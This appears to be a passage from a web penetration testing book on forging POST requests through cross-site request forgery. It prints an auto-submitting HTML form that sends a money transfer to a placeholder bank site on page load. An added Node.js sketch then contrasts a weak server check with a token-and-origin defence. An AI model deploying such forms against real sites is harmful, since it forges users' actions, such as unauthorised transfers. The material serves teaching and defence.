Exploiting POST-request based CSRF

As we discussed before, developers often make the mistake of moving critical actions on a website to POST requests by turning them into forms, assuming that a form's POST request cannot be forged. In reality it can be forged easily: the attacker uses a self-submitting form to accomplish the same thing.

A self-submitting form hosted by an attacker looks like the following:

<html>
  <head>
  </head>
  <body onload="document.getElementById('xsrf').submit()">
    <form id="xsrf" method="post" action="https://bank.example.com/transfer/money">
      <input type="hidden" name="username" value="John">
      <input type="hidden" name="amount" value="500">
    </form>
  </body>
</html>

The preceding ...
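
Seen from the server side, the forged POST above passes any check that looks only at the request method and the session cookie. The following is an added example, not code from the book: a Node.js sketch that compares such a check with one requiring a session-bound token and a matching Origin header. The field name csrf_token, the session value and the attacker origin are assumptions made for illustration.

```javascript
const crypto = require('crypto');

const SERVER_SECRET = crypto.randomBytes(32);      // per-process key (constructed)
const ALLOWED_ORIGIN = 'https://bank.example.com'; // origin from the form's action

// Token bound to the session: HMAC(secret, sessionId). A page on another origin
// can neither read it from the bank's HTML nor compute it without the secret.
function issueCsrfToken(sessionId) {
  return crypto.createHmac('sha256', SERVER_SECRET).update(sessionId).digest('hex');
}

// Weak check: any POST carrying a valid session cookie is accepted.
function weakTransferCheck(req) {
  return req.method === 'POST' && Boolean(req.sessionId);
}

// Hardened check: the request must also come from the bank's origin and carry
// the session's token in a hidden field (csrf_token is a hypothetical name).
function hardenedTransferCheck(req) {
  if (req.method !== 'POST' || !req.sessionId) return false;
  if (req.headers.origin !== ALLOWED_ORIGIN) return false;
  const expected = Buffer.from(issueCsrfToken(req.sessionId), 'hex');
  const supplied = Buffer.from(String(req.body.csrf_token || ''), 'hex');
  return supplied.length === expected.length &&
         crypto.timingSafeEqual(supplied, expected);
}

// Constructed requests. The browser attaches the victim's session cookie to
// both, which is why the cookie alone proves nothing about intent.
const SESSION = 'sess-7f3a (constructed)';
const forgedRequest = {
  method: 'POST', sessionId: SESSION,
  headers: { origin: 'https://attacker.example' },
  body: { username: 'John', amount: '500' },
};
const genuineRequest = {
  method: 'POST', sessionId: SESSION,
  headers: { origin: ALLOWED_ORIGIN },
  body: { username: 'John', amount: '500', csrf_token: issueCsrfToken(SESSION) },
};

console.log('weak, forged:      ', weakTransferCheck(forgedRequest));
console.log('hardened, forged:  ', hardenedTransferCheck(forgedRequest));
console.log('hardened, genuine: ', hardenedTransferCheck(genuineRequest));
```
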

Get Mastering Modern Web Penetration Testing now with the O’Reilly learning platform.
